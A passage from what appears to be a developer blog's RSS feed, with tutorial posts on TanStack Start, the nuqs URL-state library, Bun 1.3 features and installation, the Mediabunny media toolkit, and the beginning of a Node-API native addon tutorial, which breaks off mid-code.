<td><strong>Streaming</strong></td><td>Enables progressive page loading, significantly enhancing the user experience</td></tr>
<tr>
<td><strong>Server Functions</strong></td><td>Implements type-safe Remote Procedure Calls (RPCs) to facilitate seamless communication between the client and server</td></tr>
<tr>
<td><strong>Server/API Routes</strong></td><td>Allows developers to define and build backend endpoints directly alongside their frontend code</td></tr>
<tr>
<td><strong>Full-Stack Bundling</strong></td><td>Ensures optimized builds for both the server-side code and the client-side code</td></tr>
<tr>
<td><strong>Middleware &amp; Context</strong></td><td>Provides robust tools for handling request/response flows and injecting contextual data</td></tr>
<tr>
<td><strong>End-to-End Type Safety</strong></td><td>Offers full TypeScript support across the entire technology stack</td></tr>
</tbody>
</table>
</div><p>Developers who know with certainty they do not require any of these full-stack features may opt to use <strong>TanStack Router alone</strong> for powerful, type-safe Single-Page Application (SPA) routing</p>
<h3 id="heading-current-limitations">Current Limitations</h3>
<p>The primary relevant limitation noted in the documentation is that <strong>TanStack Start does not currently support React Server Components (RSC)</strong>. However, the documentation explicitly states that the team is <strong>actively working on integration</strong> and anticipates supporting RSC in the near future</p>
<h2 id="heading-3getting-started">3.Getting started</h2>
<p>The fastest way to get a Start project up and running is with the cli. Just run</p>
<pre><code class="lang-bash">npm create @tanstack/start@latest
</code></pre>
<p>depending on your package manage of choice. You'll be prompted to add things like Tailwind, eslint, and a ton of other options.</p>
<pre><code class="lang-bash">npx gitpick TanStack/router/tree/main/examples/react/start-basic start-basic
<span class="hljs-built_in">cd</span> start-basic
npm install
npm run dev
</code></pre>
<h2 id="heading-4why-developers-love-tanstack-start"><strong>4.Why Developers Love TanStack Start</strong></h2>
<p>Across the community, developers keep coming back to a few recurring themes</p>
<p><strong>Less magic, more control.</strong></p>
<p>Frameworks like Next.js and Remix often rely on “magic” — behaviors that happen automatically behind the scenes. TanStack Start takes the opposite approach. You stay in control of how data loads, where it runs, and what gets rendered. Nothing happens unless you make it happen.</p>
<p><strong>Feels closer to React.</strong></p>
<p>Many developers say that once they start building with TanStack Start, they forget they're even in a framework. It feels like writing plain React — just with smarter tools and a few well-chosen conveniences.</p>
<p><strong>A smoother developer experience.</strong></p>
<p>Type-safe routes, built-in server functions, and predictable data fetching make development and debugging straightforward.</p>
<p><strong>Flexible hosting and tooling.</strong></p>
<p>Thanks to Vite and Nitro under the hood, you can build and deploy anywhere. You’re not tied to a single company’s hosting platform or runtime. It’s your app, your stack, your rules.</p>
<h2 id="heading-end-notes">End Notes</h2>
<p>TanStack Start is still growing but it is already making impact. It’s community and documentations are growing quickly and it's backed by a team.</p>
<p>If you want to give it a try to TanStack Start give it a try</p>
<p><a target="_blank" href="https://tanstack.com/start/latest/docs/framework/react/overview">https://tanstack.com/start/latest/docs/framework/react/overview</a></p>
]]></content:encoded></item><item><title><![CDATA[nuqs - Type-safe search params
state manager for React]]></title><description><![CDATA[Are you tired of cumbersome query parameter handling in your React applications? State management that syncs with the URL can often feel complex, but a powerful, tiny library called nuqs aims to change that, making URL management feel like an integra...]]></description><link>https://blog.nidhin.dev/nuqs-type-safe-search-params-state-manager-for-react</link><guid isPermaLink="true">https://blog.nidhin.dev/nuqs-type-safe-search-params-state-manager-for-react</guid><category><![CDATA[nuqs]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[React]]></category><category><![CDATA[react router]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Remix]]></category><category><![CDATA[vite]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Tue, 04 Nov 2025 17:16:09 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762276508074/95086ab9-d7e9-41ba-826e-215e1ac2cea2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Are you tired of cumbersome query parameter handling in your React applications? State management that syncs with the URL can often feel complex, but a powerful, tiny library called nuqs aims to change that, making URL management feel like an integral part of your design conversation.</p>
<p>nuqs is a type-safe search params state manager for React. It provides end-to-end type safety between Server and Client components, simplifying your URL logic "like magic". Best of all, it offers a familiar, simple API that makes lifting state to the URL extremely easy. At only 6 kB gzipped, nuqs is a feature-rich, customizable, and thoroughly tested library.</p>
<h2 id="heading-1simple-state-management-with-usequerystate">1.Simple State Management with useQueryState</h2>
<p>The core strength of nuqs is its simplicity, mimicking the structure of standard React state hooks. If you currently use React.useState to manage local UI state, you can replace it with <strong>useQueryState</strong> to seamlessly sync that state with the URL.</p>
<p>The useQueryState hook requires one argument the key to be used in the query string. Like React.useState, it returns an array containing the value present in the query string (as a string or null if not found) and a state updater function</p>
<pre><code class="lang-javascript"><span class="hljs-string">'use client'</span>
<span class="hljs-keyword">import</span> { useQueryState } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span>

<span class="hljs-keyword">export</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Demo</span> (<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> [name, setName] = useQueryState(<span class="hljs-string">'name'</span>)
  <span class="hljs-comment">// ... returns name (string or null) and setName function</span>
}
</code></pre>
<p>A crucial feature is the handling of default values and types. By default, useQueryState returns a string or null. However, using built-in parsers (like parseAsInteger) allows you to define the expected type and provide a default value</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { useQueryState, parseAsInteger } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span>

<span class="hljs-comment">// `count` will be a number, defaulting to 0 if not in the URL</span>
<span class="hljs-keyword">const</span> [count, setCount] = useQueryState(<span class="hljs-string">'count'</span>, parseAsInteger.withDefault(<span class="hljs-number">0</span>))
</code></pre>
<p>Using .withDefault(0) ensures that count will never be null, simplifying state updates (e.g., setCount(c =&gt; c + 1)).</p>
<p>Note that this default value is internal to React and will not be written to the URL unless you set it explicitly. If you wish to remove a key from the query string entirely, simply set the state value to null</p>
<h2 id="heading-2universal-compatibility-with-adapters">2.Universal Compatibility with Adapters</h2>
<p>Since version 2, nuqs has embraced universal compatibility across a variety of React frameworks. This is achieved by wrapping your application entry point with the NuqsAdapter context provider.</p>
<p>Supported frameworks include</p>
<ul>
<li><p>Next.js (App router and Pages router)</p>
</li>
<li><p>React SPA (e.g., with Vite)</p>
</li>
<li><p>Remix</p>
</li>
<li><p>React Router v6 and v7</p>
</li>
<li><p>TanStack Router (experimental support)</p>
</li>
</ul>
<p>For instance, when using the Next.js App router, you wrap your components in the root layout file:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// src/app/layout.tsx </span>
<span class="hljs-keyword">import</span> { NuqsAdapter } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs/adapters/next/app'</span>
<span class="hljs-comment">// ...</span>
&lt; NuqsAdapter &gt; { children } &lt;/ NuqsAdapter &gt;
</code></pre>
<h3 id="heading-server-side-framework-considerations">Server-Side Framework Considerations</h3>
<p>If you are using a non-JavaScript server (like Django, Rails, or Laravel) and need the web server to be notified when the URL state changes (for server-side rendering other parts of the application), you can enable full-page navigation for updates configured with shallow: false. This option, introduced in version 2.4.0, is set on the adapter</p>
<pre><code class="lang-javascript">&lt;NuqsAdapter fullPageNavigationOnShallowFalseUpdates&gt;
</code></pre>
<h2 id="heading-3advanced-state-management-and-server-side-features">3.Advanced State Management and Server-Side Features</h2>
<p>While useQueryState is great for single keys, nuqs offers tools for handling multiple states and integrating seamlessly with server components.</p>
<p>Managing Multiple Keys with useQueryStates For query keys that should always move together, the useQueryStates hook is available. You pass it an object defining all keys and their parsers:</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { useQueryStates, parseAsFloat } <span class="hljs-keyword">from</span> <span class="hljs-string">'nuqs'</span> 

<span class="hljs-keyword">const</span> [coordinates, setCoordinates] = useQueryStates({
  <span class="hljs-attr">lat</span>: parseAsFloat.withDefault(<span class="hljs-number">45.18</span>),
  <span class="hljs-attr">lng</span>: parseAsFloat.withDefault(<span class="hljs-number">5.72</span>)
})
</code></pre>
<p>The setCoordinates function allows you to update all (or a subset of) the keys in a single go. All state updates are batched and applied asynchronously to the URL. Furthermore, passing null to the state updater function will clear all keys managed by that useQueryStates hook.</p>
<p>Shorter, Cleaner URLs To ensure that your variable names are readable within your codebase (e.g., latitude) while keeping your URLs short (e.g., lat), you can use the urlKeys option within the hook settings</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">const</span> [{ latitude, longitude }, setCoordinates] = useQueryStates({ <span class="hljs-comment">/* ...parsers */</span> }, {
  <span class="hljs-attr">urlKeys</span>: {
    <span class="hljs-attr">latitude</span>: <span class="hljs-string">'lat'</span>,
    <span class="hljs-attr">longitude</span>: <span class="hljs-string">'lng'</span>
  }
})
<span class="hljs-comment">// This results in URLs like: ?lat=45.18&amp;lng=5.72</span>
</code></pre>
<h3 id="heading-type-safe-server-side-reading-nextjsremix">Type-Safe Server-Side Reading (Next.js/Remix)</h3>
<p>nuqs provides essential tools for accessing search params type-safely on the server. Loaders Introduced in version 2.3.0, loaders allow you to parse search parameters server-side using the createLoader function.</p>
<p>The resulting loader function can parse search params from various sources, including Request objects, full URLs, URLSearchParams objects, or standard key-value records. For example, in a Next.js App Router component, you can consume search parameters asynchronously:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Example Server Component usage:</span>
<span class="hljs-keyword">const</span> { latitude, longitude } = <span class="hljs-keyword">await</span> loadSearchParams(searchParams)
</code></pre>
<p>If you need stricter parsing behavior, you can enable strict mode. By default, if an invalid value is found for a parser (e.g., ?count=banana for an integer), the default value is returned.</p>
<p>In strict mode, loadSearchParams will throw an error. Server Cache for accessing search parameters in deeply nested React Server Components without prop drilling, you can use createSearchParamsCache.</p>
<p>You define your parsers and then call .parse() in the root Server Component. Child Server Components can then access type-safe values using searchParamsCache.get('key')</p>
<h2 id="heading-end-notes">End Notes</h2>
<p>nuqs is a modern, elegant, and powerful solution for managing URL query parameters in the React ecosystem. It provides necessary features like type-safe server handling, batching, and universal adapter support, all while retaining a simple useState-like developer experience</p>
<p>If you are ready to simplify your URL state logic, installation is straightforward:</p>
<pre><code class="lang-bash">npm install nuqs
</code></pre>
]]></content:encoded></item><item><title><![CDATA[Bun 1.3]]></title><description><![CDATA[1.What is Bun?
Before we get to 1.3, let us quickly see what Bun is.
Imagine you have a toolbox for building web applications and running JavaScript outside of a web browser. In that toolbox, you usually have things like Node.js (to run your code), n...]]></description><link>https://blog.nidhin.dev/bun-13</link><guid isPermaLink="true">https://blog.nidhin.dev/bun-13</guid><category><![CDATA[bun1.3]]></category><category><![CDATA[Bun]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Node.js]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 19 Oct 2025 13:46:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760881866003/5dc10a38-e60f-45a4-aa83-449f7057a938.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-1what-is-bun">1.What is Bun?</h2>
<p>Before we get to 1.3, let us quickly see what Bun is.</p>
<p>Imagine you have a toolbox for building web applications and running JavaScript outside of a web browser. In that toolbox, you usually have things like Node.js (to run your code), npm or Yarn (to manage your project's packages/dependencies), and maybe a bundler like Webpack or Vite (to optimize your code for the browser).</p>
<p>Bun's big idea is to be one super-fast tool that does all of that, and more. It's like having a Swiss Army knife that replaces your whole toolbox, and it's built from the ground up to be incredibly speedy. It's written in a low-level language called Zig, which helps it achieve that performance.</p>
<h2 id="heading-2key-features-of-bun">2.Key Features of Bun</h2>
<ol>
<li><p><strong>Runtime</strong>: It can run your JavaScript and TypeScript code, just like Node.js.</p>
</li>
<li><p><strong>Package Manager</strong>: It can install, update, and manage your project's dependencies, similar to npm or Yarn. But it's way faster.</p>
</li>
<li><p><strong>Bundler</strong>: It can package your code for the browser, like Webpack or Vite, but again, super fast and built-in.</p>
</li>
<li><p><strong>Test Runner</strong>: It has its own built-in test runner.</p>
</li>
<li><p><strong>Transpiler</strong>: It understands TypeScript and JSX (React's syntax) out of the box, so no extra setup is needed.</p>
</li>
</ol>
<h2 id="heading-3whats-new-and-exciting-in-bun-13">3.What's New and Exciting in Bun 1.3?</h2>
<p>Bun 1.3 brings a bunch of improvements</p>
<ol>
<li><p><strong>Faster bun install:</strong> This is a big one! If you've ever waited for npm install to finish, you know the pain. Bun's package manager (bun install) was already fast, but 1.3 makes it even faster, especially for projects with lots of dependencies. They've optimized how it fetches and installs packages. This means less waiting and more coding for you!</p>
</li>
<li><p><strong>Windows Compatibility:</strong> (More Stable!) While Bun has been available on Windows for a bit, 1.3 significantly improves its stability and performance on the platform. They've fixed a lot of bugs and made it feel much more native and reliable for Windows users.</p>
</li>
<li><p><strong>New Bun.Glob API:</strong> This is a developer-centric feature that's pretty handy. "Globbing" is a fancy way of describing pattern matching for file paths. For example, if you want to find all .js files in a src folder, you might use a glob pattern like src/**/*.js. Bun.Glob provides a super-fast, built-in way to do this. Before, developers often had to install separate packages to handle globbing. Now it's part of Bun, and it's optimized for speed.</p>
</li>
<li><p><strong>fetch API Improvements</strong>: The fetch API is a standard way to make network requests (like getting data from a server). Bun 1.3 brings significant performance boosts and better compatibility for its fetch implementation. This means your applications that make a lot of network requests will run even quicker and more reliably.</p>
</li>
<li><p><strong>More Node.js Compatibility</strong>: Bun aims to be a drop-in replacement for Node.js. With each release, it gets closer to 100% compatibility. Bun 1.3 continues this trend by improving support for more Node.js APIs and modules. This means fewer headaches when migrating existing Node.js projects to Bun.</p>
</li>
</ol>
<h2 id="heading-4why-should-developers-care-about-bun-13">4.Why Should Developers Care About Bun 1.3?</h2>
<ul>
<li><p><strong>Speed</strong>: It's the recurring theme. Faster development, faster execution, faster installations.</p>
</li>
<li><p><strong>Simplicity</strong>: One tool to rule them all. Less configuration, less context switching between different tools.</p>
</li>
<li><p><strong>Modernity</strong>: Built for the modern JavaScript ecosystem, with native TypeScript and JSX support.</p>
</li>
<li><p><strong>Growing Ecosystem</strong>: With improved Windows support and Node.js compatibility, Bun's community and adoption are likely to grow even faster.</p>
</li>
</ul>
<h2 id="heading-5getting-started">5.Getting Started</h2>
<p>You can install Bun in your machine using the below command</p>
<pre><code class="lang-bash">curl -fsSL https://bun.sh/install | bash
</code></pre>
<p>or if you have installed bun already you can simply upgrade it</p>
<pre><code class="lang-bash">bun upgrade
</code></pre>
<h2 id="heading-6bun-for-monorepos">6.Bun for MonoRepos</h2>
<p>While Bun 1.3 itself didn't introduce new, dedicated features specifically for monorepos in the way that tools like Lerna, Turborepo, or Nx do, it significantly improves the experience of working with monorepos due to its core enhancements.</p>
<h3 id="heading-a-faster-bun-install-is-a-game-changer-for-monorepos">a. Faster bun install is a Game Changer for Monorepos</h3>
<ul>
<li><p><strong>The Problem in Monorepos</strong>: Monorepos often have many package.json files (one per package/workspace) and a large, shared node_modules directory. Running npm install or yarn install in a monorepo can be notoriously slow, especially for clean installs or when adding new dependencies.</p>
</li>
<li><p><strong>Bun 1.3's Solution</strong>: The even faster bun install directly addresses this pain point. When you run bun install at the root of your monorepo, it's designed to be incredibly efficient at resolving and linking all those dependencies across multiple workspaces.</p>
</li>
</ul>
<p>This means Quicker Setup New developers joining the project or CI/CD pipelines will get up and running much faster. Faster Dependency Changes: Adding or updating a dependency in one package won't bring your entire monorepo workflow to a crawl.</p>
<h3 id="heading-bimproved-nodejs-compatibility">b.<strong>Improved Node.js Compatibility</strong></h3>
<ul>
<li><p><strong>Monorepo Tools often Rely on Node.js</strong>: Many existing monorepo management tools (like Lerna, Turborepo, Nx, or even simple custom scripts) are built on Node.js.</p>
</li>
<li><p><strong>Bun's Benefit</strong>: As Bun's Node.js compatibility improves with 1.3, it means that these tools (or your own Node.js-based scripts within the monorepo) are more likely to run seamlessly with Bun as the underlying runtime. You can leverage Bun's speed for script execution across your workspaces without hitting compatibility walls.</p>
</li>
</ul>
<h3 id="heading-c-built-in-typescript-and-jsx-support">c. <strong>Built-in TypeScript and JSX Support</strong></h3>
<ul>
<li><p><strong>Common in Monorepos</strong>: It's very common for different packages within a monorepo to use TypeScript, React (JSX), or both.</p>
</li>
<li><p><strong>Bun's Advantage</strong>: Bun's native support means you don't need complex tsconfig.json setups or extra transpilers (like Babel or ts-node) for each package just to get things running or test them. Bun can execute your TypeScript and JSX files directly, simplifying the development experience across your monorepo's packages.</p>
</li>
</ul>
<h2 id="heading-7package-management">7.Package Management</h2>
<p>Bun's package manager gets more powerful with isolated installs, interactive updates, dependency catalogs.</p>
<h3 id="heading-a-catalogs-synchronization">a. Catalogs Synchronization</h3>
<p>Bun 1.3 makes it easier to work with monorepos.</p>
<p>Bun centralizes version management across monorepo packages with dependency <code>catalogs</code>. Define versions once in your root package.json and reference them in workspace packages.</p>
<pre><code class="lang-bash">{
  <span class="hljs-string">"name"</span>: <span class="hljs-string">"monorepo"</span>,
  <span class="hljs-string">"workspaces"</span>: [<span class="hljs-string">"packages/*"</span>],
  <span class="hljs-string">"catalog"</span>: {
    <span class="hljs-string">"react"</span>: <span class="hljs-string">"^18.0.0"</span>,
    <span class="hljs-string">"typescript"</span>: <span class="hljs-string">"^5.0.0"</span>
  }
}
</code></pre>
<p>Reference catalog versions in workspace packages:</p>
<pre><code class="lang-bash">{
  <span class="hljs-string">"name"</span>: <span class="hljs-string">"@company/ui"</span>,
  <span class="hljs-string">"dependencies"</span>: {
    <span class="hljs-string">"react"</span>: <span class="hljs-string">"catalog:"</span>
  }
}
</code></pre>
<h3 id="heading-b-isolated-installs-are-now-default-for-workspaces">b. Isolated installs are now default for workspaces</h3>
<p>Bun 1.3 introduces isolated installs. This prevents packages from accessing dependencies they don't declare in their package.json. Unlike hoisted installs (npm/Yarn's flat structure where all dependencies live in a single node_modules), isolated installs ensure each package only has access to its own declared dependencies.</p>
<p>And if you use "<strong>workspaces</strong>" in your package.json, it is made as default.</p>
<p>To opt-out you can do either one of the thing</p>
<pre><code class="lang-bash">bun install --linker=hoisted
</code></pre>
<p>or just update it in bunfig.toml</p>
<pre><code class="lang-bash">[install]
linker = <span class="hljs-string">"hoisted"</span>
</code></pre>
<h3 id="heading-c-new-commands">c. New Commands</h3>
<p>Bun 1.3 adds several commands that make package management easier</p>
<ol>
<li><p><code>bun why</code> - explains why a package is installed</p>
</li>
<li><p><code>bun update --interactive</code> - lets you choose which dependencies to update</p>
</li>
<li><p><code>bun info</code> - lets you view package metadata</p>
</li>
<li><p><code>bun install --analyze</code> - lets you scans your code for imports that aren't in package.json and installs them</p>
</li>
<li><p><code>bun audit</code> scans dependencies for known vulnerabilities using the same database as npm audit</p>
</li>
</ol>
<h2 id="heading-8explore-more-about-bun">8.Explore more about Bun</h2>
<ul>
<li><p>Want to deep dive to see what’s new in Bun 1.3 feel free to look at the official documentation of Bun - <a target="_blank" href="https://bun.com/blog/bun-v1.3">https://bun.com/blog/bun-v1.3</a></p>
</li>
<li><p>Bun - <a target="_blank" href="https://bun.com/">https://bun.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Mediabunny - Mediatoolkit for Modern Web]]></title><description><![CDATA[In today's fast-paced digital world, rich media—video and audio—is everywhere. From social media feeds to educational platforms, e-commerce, and entertainment, the ability to effectively handle media files directly within the browser has become not j...]]></description><link>https://blog.nidhin.dev/mediabunny-mediatoolkit-for-modern-web</link><guid isPermaLink="true">https://blog.nidhin.dev/mediabunny-mediatoolkit-for-modern-web</guid><category><![CDATA[#Mediabunny]]></category><category><![CDATA[#WebCodecs ]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[video]]></category><category><![CDATA[audio]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 26 Sep 2025 17:52:16 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1758908821947/9b3958d0-bf36-42bb-97aa-d98dcdcf1328.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In today's fast-paced digital world, rich media—video and audio—is everywhere. From social media feeds to educational platforms, e-commerce, and entertainment, the ability to effectively handle media files directly within the browser has become not just a luxury, but a necessity for building truly dynamic and responsive web applications.</p>
<p>Mediabunny, a brand-new, open-source JavaScript library designed to be a complete toolkit for high-performance media operations on the web.</p>
<h3 id="heading-why-mediabunny-the-need-for-in-browser-media-power"><strong>Why Mediabunny? The Need for In-Browser Media Power</strong></h3>
<p>For years, developers have relied on server-side solutions like <a target="_blank" href="https://ffmpeg.org/"><strong>FFmpeg</strong></a> for robust media processing tasks such as converting, encoding, and manipulating video and audio files. While incredibly powerful, these solutions often introduce latency, increase server load, and can be complex to integrate.</p>
<p>Mediabunny changes this paradigm. It's vision was to create a "<strong>FFmpeg for the web</strong>" – a pure TypeScript library built from scratch, optimized for browser environments, and leveraging modern web APIs like WebCodecs to unlock unparalleled speed and efficiency.</p>
<p>The goal is simple: empower developers to perform complex media operations directly in the user's browser, faster than anybunny else!</p>
<h3 id="heading-key-features-that-set-mediabunny-apart"><strong>Key Features that Set Mediabunny apart</strong></h3>
<ol>
<li><p>Mediabunny isn't just another media library it's a comprehensive suite of tools engineered for precision and performance</p>
</li>
<li><p><strong>Wide Format Support</strong>: Handle a vast array of media types with ease. Mediabunny can read and write popular formats including MP4, MOV, WebM, MKV, WAVE, MP3, Ogg, ADTS, and FLAC.</p>
</li>
<li><p><strong>Built-in Encoding &amp; Decoding</strong>: Forget server roundtrips. Mediabunny supports over 25 video, audio, and subtitle codecs, leveraging the browser's native hardware acceleration through the WebCodecs API for lightning-fast processing.</p>
</li>
<li><p><strong>High Precision Operations</strong>: Need microsecond-accurate trimming or frame extraction? Mediabunny provides fine-grained control for all reading and writing operations.</p>
</li>
<li><p><strong>Powerful Conversion API</strong>: Easy-to-use API offers a wealth of features including</p>
</li>
</ol>
<ul>
<li><p><strong>Transmuxing &amp; Transcoding</strong>: Change container formats or codecs efficiently.</p>
</li>
<li><p><strong>Resizing &amp; Cropping</strong>: Adjust video dimensions and focus.</p>
</li>
<li><p><strong>Rotation</strong>: Correct video orientation.</p>
</li>
<li><p><strong>Resampling</strong>: Modify audio sample rates.</p>
</li>
<li><p><strong>Trimming</strong>: Cut video and audio segments with precision.</p>
</li>
</ul>
<h3 id="heading-other-features"><strong>Other Features</strong></h3>
<ol>
<li><p><strong>Streaming I/O</strong>: Memory efficiency is crucial for large files. Mediabunny handles reading and writing files of virtually any size using memory-efficient streaming, preventing browser slowdowns.</p>
</li>
<li><p><strong>Extremely Tree-shakable</strong>: Mediabunny is designed so you only include the features you actually use, leading to incredibly small final bundle sizes (as small as 5 kB gzipped!).</p>
</li>
<li><p><strong>Zero Dependencies</strong>: To ensure maximum performance and minimal overhead, Mediabunny is implemented entirely in highly performant TypeScript, with absolutely zero external dependencies.</p>
</li>
<li><p><strong>Cross-Platform Compatibility</strong>: Whether you're building for web browsers or backend Node.js applications, Mediabunny works seamlessly across both environments.</p>
</li>
</ol>
<h2 id="heading-installation"><strong>Installation</strong></h2>
<p>Install it via npm using the following command</p>
<pre><code class="lang-bash">  npm install mediabunny
</code></pre>
<p>Alternatively, include it directly with a script tag using one of the builds. Doing so exposes a global Mediabunny object.</p>
<pre><code class="lang-bash">  &lt;script src=<span class="hljs-string">"mediabunny.cjs"</span>&gt;&lt;/script&gt;
</code></pre>
<h3 id="heading-convert-files"><strong>Convert files</strong></h3>
<p>Will see a sample code on how we can convert a file</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">import</span> { Input, Output, Conversion, ALL_FORMATS, BlobSource, WebMOutputFormat } <span class="hljs-keyword">from</span> <span class="hljs-string">'mediabunny'</span>;

<span class="hljs-keyword">const</span> input = <span class="hljs-keyword">new</span> Input({
    <span class="hljs-attr">source</span>: <span class="hljs-keyword">new</span> BlobSource(file),
    <span class="hljs-attr">formats</span>: ALL_FORMATS,
});

<span class="hljs-keyword">const</span> output = <span class="hljs-keyword">new</span> Output({
    <span class="hljs-attr">format</span>: <span class="hljs-keyword">new</span> WebMOutputFormat(), <span class="hljs-comment">// Convert to WebM</span>
    <span class="hljs-attr">target</span>: <span class="hljs-keyword">new</span> BufferTarget(),
});

<span class="hljs-keyword">const</span> conversion = <span class="hljs-keyword">await</span> Conversion.init({ input, output });
<span class="hljs-keyword">await</span> conversion.execute();
</code></pre>
<h2 id="heading-open-source-and-community-driven"><strong>Open Source and Community-Driven</strong></h2>
<p>Mediabunny is an open-source project released under the MPL-2.0 license. This means it's completely free to use for any purpose, including closed-source commercial applications.</p>
<p>With Mediabunny, developers can now build richer, more interactive, and performant web applications that handle media files like never before. Imagine in-browser video editors, audio transcoders, or advanced media analysis tools – all running client-side, delivering an instantaneous user experience.</p>
<h2 id="heading-know-more-about-mediabunny"><strong>Know more about Mediabunny</strong></h2>
<ul>
<li><p>Website: <a target="_blank" href="https://mediabunny.dev/"><strong>https://mediabunny.dev/</strong></a></p>
</li>
<li><p>Github: <a target="_blank" href="https://github.com/Vanilagy/mediabunny"><strong>https://github.com/Vanilagy/mediabunny</strong></a></p>
</li>
<li><p>Docs: <a target="_blank" href="https://mediabunny.dev/guide/introduction"><strong>https://mediabunny.dev/guide/introduction</strong></a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Unlocking Native Performance in Node.js with Node-API (N-API)]]></title><description><![CDATA[Node.js is fast, flexible, and great for building APIs, servers, and full-stack apps. But sometimes JavaScript isn’t enough.

What if you need blazing-fast performance?

Or you want to use an existing C/C++ library instead of rewriting it in JS?

Or ...]]></description><link>https://blog.nidhin.dev/unlocking-native-performance-in-nodejs-with-node-api-n-api</link><guid isPermaLink="true">https://blog.nidhin.dev/unlocking-native-performance-in-nodejs-with-node-api-n-api</guid><category><![CDATA[#Nodeapi]]></category><category><![CDATA[Node.js]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Web Development]]></category><category><![CDATA[Node.js API]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 13 Sep 2025 18:25:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1757787826166/ca5e0307-f1bd-4002-aa1b-3436509bed14.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Node.js is fast, flexible, and great for building APIs, servers, and full-stack apps. But sometimes JavaScript isn’t enough.</p>
<ul>
<li><p>What if you need <strong>blazing-fast performance</strong>?</p>
</li>
<li><p>Or you want to use an existing <strong>C/C++ library</strong> instead of rewriting it in JS?</p>
</li>
<li><p>Or maybe you need access to <strong>low-level system features</strong> like file systems, drivers, or hardware?</p>
</li>
</ul>
<p>That’s where <strong>Node-API (N-API)</strong> comes in.</p>
<h2 id="heading-1what-is-node-api-n-api"><strong>1.What is Node-API (N-API)?</strong></h2>
<p><strong>Node-API</strong> is a <strong>stable C API</strong> for building <strong>native addons</strong> in Node.js.</p>
<p>Before Node-API, addons were tied directly to V8 (Node’s JavaScript engine). Every Node.js or V8 update risked breaking your addon.</p>
<p>With Node-API:</p>
<ul>
<li><p>Addons work across Node.js versions.</p>
</li>
<li><p>It’s <strong>engine-independent</strong> (works with V8, ChakraCore, Hermes, etc.).</p>
</li>
<li><p>It provides a <strong>stable ABI</strong> (Application Binary Interface).</p>
</li>
</ul>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Node-API is the <strong>bridge</strong> between JavaScript and native code.</div>
</div>

<h2 id="heading-2why-should-you-want-n-api"><strong>2.Why Should You want N-API?</strong></h2>
<ul>
<li><p><strong>Future-proof</strong> - Your addon won’t break every time Node.js upgrades.</p>
</li>
<li><p><strong>Performance</strong> - Run CPU-heavy tasks in native code.</p>
</li>
<li><p><strong>Reuse existing libraries</strong> - Wrap C/C++ instead of reinventing in JS.</p>
</li>
<li><p><strong>System access</strong> - Do things pure JS can’t (hardware, OS integration).</p>
</li>
</ul>
<p>Popular modules that use native code:</p>
<ul>
<li><p><strong>bcrypt</strong> → password hashing</p>
</li>
<li><p><strong>sharp</strong> → image processing</p>
</li>
<li><p><strong>sqlite3</strong> → database driver</p>
</li>
</ul>
<h2 id="heading-3how-node-api-works"><strong>3.How Node-API Works?</strong></h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1757778047784/3805fc4c-57b6-49bc-8c3f-a9f7c449abb9.png" alt class="image--center mx-auto" /></p>
<p>JavaScript talks to Node-API, which safely communicates with your C/C++ addon.</p>
<h2 id="heading-4lets-build-a-tiny-addon">4.Let’s build a tiny addon</h2>
<p>Let’s make our hand’s dirty by building a tiny addon</p>
<h3 id="heading-step-1-prerequisites">Step 1: Prerequisites</h3>
<p>Make sure you have:</p>
<ul>
<li><p>Node.js</p>
</li>
<li><p>Python (for build tools)</p>
</li>
<li><p>C++ compiler (gcc/clang/MSVC)</p>
</li>
</ul>
<pre><code class="lang-bash">npm install -g node-gyp
</code></pre>
<h3 id="heading-step-2-addon-code-c">Step 2: Addon Code (C++)</h3>
<p>Create a new file named hello.cpp</p>
<pre><code class="lang-cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;napi.h&gt;</span></span>

<span class="hljs-comment">// This is the native C++ function that will be exposed to JavaScript.</span>
<span class="hljs-comment">// It takes the standard N-API CallbackInfo object and returns a Napi::Value.</span>
<span class="hljs-function">Napi::Value <span class="hljs-title">HelloWorld</span><span class="hljs-params">(<span class="hljs-keyword">const</span> Napi::CallbackInfo&amp; info)</span> </span>{
  <span class="hljs-comment">// Napi::Env is the environment context for the current Node.js instance.</span>
  <span class="hljs-comment">// It's used to create JavaScript values (strings, numbers, objects, etc.).</span>
  Napi::Env env = info.Env();

  <span class="hljs-comment">// Create a new JavaScript string with the value "Hello World from C++!"</span>
